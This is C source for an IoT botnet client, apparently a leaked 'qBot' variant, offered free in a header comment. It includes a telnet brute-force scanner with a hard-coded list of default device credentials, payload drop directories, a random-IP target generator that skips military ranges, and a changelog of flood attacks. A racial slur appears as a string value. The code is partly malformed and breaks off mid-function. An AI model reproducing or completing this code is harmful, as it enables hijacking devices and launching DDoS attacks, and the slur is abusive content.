// Kaden SKIDDED one of the sources i sold him and changed the name, this is nothing new, same features as priv8 yakuza
// This source is absolutely retarded i dont recommend using it but it became kinda popular
// This is not worth more than 10$ but since it was being sold for 30$... enjoy it for free.
// Scarface#1162
Execution qBot
created by Kaden
1.0 :
Basic Attacks Added
Good STD / UDP
Nameserver Updater
Device Cleaner
Updated for better L4
Improved Stability
Port Closer Removed 100%
Removed some junk shit
Updated useragents
killed port closer
More improvements to SSH stability
Removed Cleaner while infecting bots
Fixed Update and Clean commands
Nameserver Updater and Device Cleaner must be manually toggeled. (Stability reasons / kills bots)
More stability Improvements
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <strings.h>
#include <string.h>
#include <sys/utsname.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <time.h>
#include <dirent.h>
#include <ctype.h>
#include <sys/prctl.h>
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12
#define PR_SET_NAME 15
#define PHI 0x9e3779b9
#define CMD_IAC 255
#define CMD_WILL 251
#define CMD_WONT 252
#define CMD_DO 253
#define CMD_DONT 254
#define OPT_SGA 3
#define STD2_SIZE 65
#define STD_PIGZ 69
#define BUFFER_SIZE 1024
#define SERVER_LIST_SIZE (sizeof(ServerInfo) / sizeof(unsigned char *))
char *getBuild() {
#if defined(__x86_64__) || defined(_M_X64)
return "x86_64";
#elif defined(__i386) || defined(__i386__) || defined(_M_IX86)
return "x86_32";
#elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
return "ARM-4";
#elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
return "ARM-5"
#elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6J_) || defined(__ARM_ARCH_6M_)
return "ARM-6";
#elif defined(__ARM_ARCH_7_) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__)
return "ARM-7";
#elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
return "MIPS";
#elif defined(__sh__)
return "SUPERH";
#elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
return "POWERPC";
return "UNKNOWN";
char *getBuildz()
if(access("/usr/bin/python", F_OK) != -1){
return "SERVER";
} else {
return "DEVICE";
const char *useragents[] = {
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
"FAST-WebCrawler/3.6 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"TheSuBot/0.2 (www.thesubot.de)",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
"BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
"FAST-WebCrawler/3.7 (atw-crawler at fast dot no; http://fast.no/support/crawler.asp)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20090718 Firefox/3.5.1",
"zspider/0.9-dev http://feedback.redkolibri.com/",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv: Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194ABaiduspider+(+http://www.baidu.com/search/spider.htm)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20090327 Galeon/2.0.7",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15",
"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
"Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/",
"Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/ NintendoBrowser/",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
"Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; cn) Opera 11.00",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/5.0 (X11; U; Linux x86_64; de; rv: Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux x86_64; de; rv: Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.01",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
#define PRINTS
#define Server_Botport 282
unsigned char *ServerInfo[] = {""};
char *BusyBoxPayload = "Nigger";
char *SSHPayload = "Nigger2";
char *usernames[] = {
"root\0", //root:
"root\0", //root:admin
"admin\0", //admin:admin
"root\0", //root:default
"volition\0", //volition:volition
"daemon\0", // daemon:daemon
"support\0" //support:support
"supervisor\0", //supervisor:zyad1234
"root\0", //root:anko
"guest\0", //guest:123456
"default\0", //default:default
"telnet\0", //telnet:telnet
"root\0", //root:root
"root\0", //root:changeme
"root\0", //root:hunt5759
"ubnt\0", //ubnt:ubnt
"root\0", //root:5up
"root\0", //root:password
"root\0", //root:default
"root\0", //root:changeme
"root\0", //root:1234
"root\0", //root:xc3511
"root\0", //root:zsun1188
"root\0", //root:awind5885
"root\0", //root:hi3518
"root\0", //root:a6a7wimax
"admin\0", //admin:radius
"usuario\0", //usuario:usuario
"user\0", //user:user
"root\0", //root:calvin
"admin\0", //admin:tech
"admin\0", //admin:aquario
"admin\0", //admin:asante
"admin\0", // admin:vertex25ektks123
"admin\0", //admin:cat1029
"root\0", //root:vertex25ektks123
"root\0" //root:cat1029
char *passwords[] = {
"\0", //root:
"admin\0", // root:admin
"admin\0", // admin:admin
"default\0", // root:default
"volition\0", //volition:volition
"daemon\0", // daemon:daemon
"support\0" //support:support
"zyad1234\0", //supervisor:zyad1234
"anko\0", //root:anko
"123456\0", //guest:123456
"default\0", //default:default
"telnet\0", //telnet:telnet
"root\0", //root:root
"changeme\0", //root:changeme
"hunt5759\0", //root:hunt5759
"ubnt\0", //ubnt:ubnt
"5up\0", //root:5up
"password\0", //root:password
"default\0", //root:default
"changeme\0", //root:changeme
"1234\0", //root:1234
"xc3511\0", //root:xc3511
"zsun1188\0", //root:zsun1188
"awind5885\0", //root:awind5885
"hi3518\0", //root:hi3518
"a6a7wimax\0", //root:a6a7wimax
"radius\0", //admin:radius
"usuario\0", //usuario:usuario
"user\0", //user:user
"calvin\0", //root:calvin
"tech\0", //admin:tech
"aquario\0", //admin:aquario
"asante\0", //admin:asante
"vertex25ektks123\0", //admin:vertex25ektks123
"cat1029\0", //admin:cato1029
"vertex25ektks123\0", //root:vertex25ektks123
"cat1029\0" //root:cat1029
char *tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", "/opt/", (char*)0};
char *advances[] = {":", "ogin", "sername", "assword", (char*)0};
char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
char *successes[] = {"busybox", "$", "#", (char*)0};
char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
int botnetServer = -1;
uint32_t *pids;
uint32_t botnetPid;
uint64_t numpids = 0;
struct in_addr ourIP;
struct in_addr ourPublicIP;
unsigned char macAddress[6] = {0};
char *inet_ntoa(struct in_addr in);
int KadenCommStock = 0;
int botnetPrint(int sock, char *formatStr, ...);
static uint32_t Q[4096], c = 362436;
void update()
void init_rand(uint32_t x) {
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
uint32_t rand_cmwc(void) {
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (uint32_t)(t >> 32);
x = t + c;
if (x < c) {
return (Q[i] = r - x);
static uint32_t x, y, z, w;
void rand_init(void) {
x = time(NULL);
y = getpid() ^ getppid();
z = clock();
w = z ^ y;
uint32_t rand_next(void) {
uint32_t t = x;
t ^= t << 11;
t ^= t >> 8;
x = y; y = z; z = w;
w ^= w >> 19;
w ^= t;
return w;
void rand_str(char *str, int len) {
while (len > 0) {
if (len >= 4) {
*((uint32_t *)str) = rand_next();
str += sizeof (uint32_t);
len -= sizeof (uint32_t);
else if (len >= 2) {
*((uint16_t *)str) = rand_next() & 0xFFFF;
str += sizeof (uint16_t);
len -= sizeof (uint16_t);
} else {
*str++ = rand_next() & 0xFF;
void rand_alphastr(uint8_t *str, int len) {
const char alphaset[] = "n0lcy2htqqyekttqrpwxf8ecw60026u"; //keep this as is (randomize everytime you recompile) 31 chars
while (len > 0) {
if (len >= sizeof (uint32_t)) {
int i;
uint32_t entropy = rand_next();
for (i = 0; i < sizeof (uint32_t); i++) {
uint8_t tmp = entropy & 0xff;
entropy = entropy >> 8;
tmp = tmp >> 3;
*str++ = alphaset[tmp];
len -= sizeof (uint32_t);
} else {
*str++ = rand_next() % (sizeof (alphaset));
int util_strlen(char *str) {
int c = 0;
while (*str++ != 0)
return c;
void util_memcpy(void *dst, void *src, int len) {
char *r_dst = (char *)dst;
char *r_src = (char *)src;
while (len--)
*r_dst++ = *r_src++;
int util_strcpy(char *dst, char *src) {
int l = util_strlen(src);
util_memcpy(dst, src, l + 1);
return l;
static void printchar(unsigned char **str, int c) {
if (str) {
**str = c;
else (void)write(1, &c, 1);
unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd) {
int got = 1, total = 0;
while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
return got == 0 ? NULL : buffer;
static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
register int pc = 0, padchar = ' ';
if (width > 0) {
register int len = 0;
register const unsigned char *ptr;
for (ptr = string; *ptr; ++ptr) ++len;
if (len >= width) width = 0;
else width -= len;
if (pad & PAD_ZERO) padchar = '0';
if (!(pad & PAD_RIGHT)) {
for ( ; width > 0; --width) {
printchar (out, padchar);
for ( ; *string ; ++string) {
printchar (out, *string);
for ( ; width > 0; --width) {
printchar (out, padchar);
return pc;
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
unsigned char print_buf[PRINT_BUF_LEN];
register unsigned char *s;
register int t, neg = 0, pc = 0;
register unsigned int u = i;
if (i == 0) {
print_buf[0] = '0';
print_buf[1] = '\0';
return prints (out, print_buf, width, pad);
if (sg && b == 10 && i < 0) {
neg = 1;
u = -i;
s = print_buf + PRINT_BUF_LEN-1;
*s = '\0';
while (u) {
t = u % b;
if( t >= 10 )
t += letbase - '0' - 10;
*--s = t + '0';
u /= b;
if (neg) {
if( width && (pad & PAD_ZERO) ) {
printchar (out, '-');
} else {
*--s = '-';
return pc + prints (out, s, width, pad);
static int print(unsigned char **out, const unsigned char *format, va_list args ) {
register int width, pad;
register int pc = 0;
unsigned char scr[2];
for (; *format != 0; ++format) {
if (*format == '%') {
width = pad = 0;
if (*format == '\0') break;
if (*format == '%') goto out;
if (*format == '-') {
pad = PAD_RIGHT;
while (*format == '0') {
pad |= PAD_ZERO;
for ( ; *format >= '0' && *format <= '9'; ++format) {
width *= 10;
width += *format - '0';
if( *format == 's' ) {
register char *s = (char *)va_arg( args, intptr_t );
pc += prints (out, s?s:"(null)", width, pad);
if( *format == 'd' ) {
pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
if( *format == 'x' ) {
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
if( *format == 'X' ) {
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
if( *format == 'u' ) {
pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
if( *format == 'c' ) {
scr[0] = (unsigned char)va_arg( args, int );
scr[1] = '\0';
pc += prints (out, scr, width, pad);
} else {
printchar (out, *format);
if (out) **out = '\0';
va_end( args );
return pc;
int szprintf(unsigned char *out, const unsigned char *format, ...) {
va_list args;
va_start( args, format );
return print( &out, format, args );
int botnetPrint(int sock, char *formatStr, ...) {
unsigned char *textBuffer = malloc(2048);
memset(textBuffer, 0, 2048);
char *orig = textBuffer;
va_list args;
va_start(args, formatStr);
print(&textBuffer, formatStr, args);
orig[strlen(orig)] = '\n';
int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
return q;
void trim(char *str) {
int i;
int begin = 0;
int end = strlen(str) - 1;
while (isspace(str[begin])) begin++;
while ((end >= begin) && isspace(str[end])) end--;
for (i = begin; i <= end; i++) str[i - begin] = str[i];
str[i - begin] = '\0';
int getHost(unsigned char *toGet, struct in_addr *i) {
struct hostent *h;
if((i->s_addr = inet_addr(toGet)) == -1) return 1;
return 0;
int recvLine(int socket, unsigned char *buf, int bufsize) {
memset(buf, 0, bufsize);
fd_set myset;
struct timeval tv;
tv.tv_sec = 30;
tv.tv_usec = 0;
FD_SET(socket, &myset);
int selectRtn, retryCount;
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
while(retryCount < 10) {
tv.tv_sec = 30;
tv.tv_usec = 0;
FD_SET(socket, &myset);
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
unsigned char tmpchr;
unsigned char *cp;
int count = 0;
cp = buf;
while(bufsize-- > 1) {
if(recv(KadenCommStock, &tmpchr, 1, 0) != 1) {
*cp = 0x00;
return -1;
*cp++ = tmpchr;
if(tmpchr == '\n') break;
*cp = 0x00;
return count;
int connectTimeout(int fd, char *host, int port, int timeout) {
struct sockaddr_in dest_addr;
fd_set myset;
struct timeval tv;
socklen_t lon;
int valopt;
long arg = fcntl(fd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(fd, F_SETFL, arg);
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if(getHost(host, &dest_addr.sin_addr)) return 0;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
if (res < 0) {
if (errno == EINPROGRESS) {
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_SET(fd, &myset);
if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
lon = sizeof(int);
getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) return 0;
else return 0;
else return 0;
arg = fcntl(fd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(fd, F_SETFL, arg);
return 1;
int listFork() {
uint32_t parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent;
newpids = (uint32_t*)malloc((numpids + 1) * 4);
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
pids = newpids;
return parent;
struct telstate_t {
int fd;
unsigned int ip;
unsigned char state;
unsigned char complete;
unsigned char usernameInd;
unsigned char passwordInd;
unsigned char tempDirInd;
unsigned int totalTimeout;
unsigned short bufUsed;
char *sockbuf;
const char* get_telstate_host(struct telstate_t* telstate) {
struct in_addr in_addr_ip;
in_addr_ip.s_addr = telstate->ip;
return inet_ntoa(in_addr_ip);
int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
int num_bytes, i;
memset(buffer, 0, buf_size);
num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
if(buffer[0] == 0xFF) {
negotiate(fd, buffer, 3);
if(contains_string(buffer, strings)) {
return 1;
return 0;
int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
fd_set read_set;
struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = timeout_usec;
FD_SET(fd, &read_set);
if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
return 0;
return recv(fd, buffer, buf_size, 0);
void advance_state(struct telstate_t* telstate, int new_state) {
if(new_state == 0) {
telstate->totalTimeout = 0;
telstate->state = new_state;
memset((telstate->sockbuf), 0, BUFFER_SIZE);
void reset_telstate(struct telstate_t* telstate) {
advance_state(telstate, 0);
telstate->complete = 1;
int contains_success(char* buffer) {
return contains_string(buffer, successes);
int contains_fail(char* buffer) {
return contains_string(buffer, fails);
int contains_response(char* buffer) {
return contains_success(buffer) || contains_fail(buffer);
int contains_string(char* buffer, char** strings) {
int num_strings = 0, i = 0;
for(num_strings = 0; strings[++num_strings] != 0; );
for(i = 0; i < num_strings; i++) {
if(strcasestr(buffer, strings[i])) {
return 1;
return 0;
int negotiate(int sock, unsigned char *buf, int len) {
unsigned char c;
switch (buf[1]) {
case CMD_IAC: return 0;
case CMD_WILL:
case CMD_WONT:
case CMD_DO:
case CMD_DONT:
c = CMD_IAC;
send(sock, &c, 1, MSG_NOSIGNAL);
if (CMD_WONT == buf[1]) c = CMD_DONT;
else if (CMD_DONT == buf[1]) c = CMD_WONT;
else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
send(sock, &c, 1, MSG_NOSIGNAL);
send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
return 0;
int matchPrompt(char *bufStr) {
char *prompts = ":>%$#\0";
int bufLen = strlen(bufStr);
int i, q = 0;
for(i = 0; i < strlen(prompts); i++) {
while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
if(*(bufStr + bufLen - q) == prompts[i]) return 1;
return 0;
int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex) {
int bufferUsed = initialIndex, got = 0, found = 0;
fd_set myset;
struct timeval tv;
tv.tv_sec = timeout;
tv.tv_usec = timeoutusec;
unsigned char *initialRead = NULL;
while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0)) {
FD_SET(fd, &myset);
if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
initialRead = buffer + bufferUsed;
got = recv(fd, initialRead, 1, 0);
if(got == -1 || got == 0) return 0;
bufferUsed += got;
if(*initialRead == 0xFF) {
got = recv(fd, initialRead + 1, 2, 0);
if(got == -1 || got == 0) return 0;
bufferUsed += got;
if(!negotiate(fd, initialRead, 3)) return 0;
} else {
if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
if(found) return 1;
return 0;
in_addr_t GIP() { //Like my ipstates?
static uint8_t ipState[4] = {0};
ipState[0] = rand() % 223;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
(ipState[0] == 127) || //Loopback
(ipState[0] == 0) || //Invalid address space
(ipState[0] == 3) || //General Electric Company
(ipState[0] == 15) || //Hewlett-Packard Company
(ipState[0] == 56) || //US Postal Service
(ipState[0] == 10) || //Internal network
(ipState[0] == 25) || //Some more
(ipState[0] == 49) || //Some more
(ipState[0] == 50) || //Some more
(ipState[0] == 137) || //Some more
(ipState[0] == 6) || //Department of Defense
(ipState[0] == 7) || //Department of Defense
(ipState[0] == 11) || //Department of Defense
(ipState[0] == 21) || //Department of Defense
(ipState[0] == 22) || //Department of Defense
(ipState[0] == 26) || //Department of Defense
(ipState[0] == 28) || //Department of Defense
(ipState[0] == 29) || //Department of Defense
(ipState[0] == 30) || //Department of Defense
(ipState[0] == 33) || //Department of Defense
(ipState[0] == 55) || //Department of Defense
(ipState[0] == 214) || //Department of Defense
(ipState[0] == 215) || //Department of Defense
(ipState[0] == 192 && ipState[1] == 168) || //Internal network
(ipState[0] == 146 && ipState[1] == 17) || //Internal network
(ipState[0] == 146 && ipState[1] == 80) || //IANA NAT reserved
(ipState[0] == 146 && ipState[1] == 98) || //IANA NAT reserved
(ipState[0] == 146 && ipState[1] == 154) || //IANA Special use
(ipState[0] == 147 && ipState[1] == 159) || //Some more
(ipState[0] == 148 && ipState[1] == 114) || //Some more
(ipState[0] == 150 && ipState[1] == 125) || //Some more
(ipState[0] == 150 && ipState[1] == 133) || //Some more
(ipState[0] == 150 && ipState[1] == 144) || //Some more
(ipState[0] == 150 && ipState[1] == 149) || //Some more
(ipState[0] == 150 && ipState[1] == 157) || //Some more
(ipState[0] == 150 && ipState[1] == 184) || //Some more
(ipState[0] == 150 && ipState[1] == 190) || //Some more
(ipState[0] == 150 && ipState[1] == 196) || //Some more
(ipState[0] == 152 && ipState[1] == 82) || //Some more
(ipState[0] == 152 && ipState[1] == 229) || //Some more
(ipState[0] == 157 && ipState[1] == 202) || //Some more
(ipState[0] == 157 && ipState[1] == 217) || //Some more
(ipState[0] == 161 && ipState[1] == 124) || //Some more
(ipState[0] == 162 && ipState[1] == 32) || //Some more
(ipState[0] == 155 && ipState[1] == 96) || //Some more
(ipState[0] == 155 && ipState[1] == 149) || //Some more
(ipState[0] == 155 && ipState[1] == 155) || //Some more
(ipState[0] == 155 && ipState[1] == 178) || //Some more
(ipState[0] == 164 && ipState[1] == 158) || //Some more
(ipState[0] == 156 && ipState[1] == 9) || //Some more
(ipState[0] == 167 && ipState[1] == 44) || //Some more
(ipState[0] == 168 && ipState[1] == 68) || //Some more
(ipState[0] == 168 && ipState[1] == 85) || //Some more
(ipState[0] == 168 && ipState[1] == 102) || //Some more
(ipState[0] == 203 && ipState[1] == 59) || //Some more
(ipState[0] == 204 && ipState[1] == 34) || //Some more
(ipState[0] == 207 && ipState[1] == 30) || //Some more
(ipState[0] == 117 && ipState[1] == 55) || //Some more
(ipState[0] == 117 && ipState[1] == 56) || //Some more
(ipState[0] == 80 && ipState[1] == 235) || //Some more
(ipState[0] == 207 && ipState[1] == 120) || //Some more
(ipState[0] == 209 && ipState[1] == 35) || //Some more
(ipState[0] == 64 && ipState[1] == 70) || //Some more
(ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || //Some more
(ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || //Some more
(ipState[0] == 169 && ipState[1] == 254) || //Some more
(ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || //Some more
(ipState[0] == 64 && ipState[1] >= 69 && ipState[1] < 227) || //Some more
(ipState[0] == 128 && ipState[1] >= 35 && ipState[1] < 237) || //Some more
(ipState[0] == 129 && ipState[1] >= 22 && ipState[1] < 255) || //Some more
(ipState[0] == 130 && ipState[1] >= 40 && ipState[1] < 168) || //Some more
(ipState[0] == 131 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
(ipState[0] == 132 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
(ipState[0] == 134 && ipState[1] >= 5 && ipState[1] < 235) || //Some more
(ipState[0] == 136 && ipState[1] >= 177 && ipState[1] < 223) || //Some more
(ipState[0] == 138 && ipState[1] >= 13 && ipState[1] < 194) || //Some more
(ipState[0] == 139 && ipState[1] >= 31 && ipState[1] < 143) || //Some more
(ipState[0] == 140 && ipState[1] >= 1 && ipState[1] < 203) || //Some more
(ipState[0] == 143 && ipState[1] >= 45 && ipState[1] < 233) || //Some more
(ipState[0] == 144 && ipState[1] >= 99 && ipState[1] < 253) || //Some more
(ipState[0] == 146 && ipState[1] >= 165 && ipState[1] < 166) || //Some more
(ipState[0] == 147 && ipState[1] >= 35 && ipState[1] < 43) || //Some more
(ipState[0] == 147 && ipState[1] >= 103 && ipState[1] < 105) || //Some more
(ipState[0] == 147 && ipState[1] >= 168 && ipState[1] < 170) || //Some more
(ipState[0] == 147 && ipState[1] >= 198 && ipState[1] < 200) || //Some more
(ipState[0] == 147 && ipState[1] >= 238 && ipState[1] < 255) || //Some more
(ipState[0] == 150 && ipState[1] >= 113 && ipState[1] < 115) || //Some more
(ipState[0] == 152 && ipState[1] >= 151 && ipState[1] < 155) || //Some more
(ipState[0] == 153 && ipState[1] >= 21 && ipState[1] < 32) || //Some more
(ipState[0] == 155 && ipState[1] >= 5 && ipState[1] < 10) || //Some more
(ipState[0] == 155 && ipState[1] >= 74 && ipState[1] < 89) || //Some more
(ipState[0] == 155 && ipState[1] >= 213 && ipState[1] < 222) || //Some more
(ipState[0] == 157 && ipState[1] >= 150 && ipState[1] < 154) || //Some more
(ipState[0] == 158 && ipState[1] >= 1 && ipState[1] < 21) || //Some more
(ipState[0] == 158 && ipState[1] >= 235 && ipState[1] < 247) || //Some more
(ipState[0] == 159 && ipState[1] >= 120 && ipState[1] < 121) || //Some more
(ipState[0] == 160 && ipState[1] >= 132 && ipState[1] < 151) || //Some more
(ipState[0] == 64 && ipState[1] >= 224 && ipState[1] < 227) || //Some more
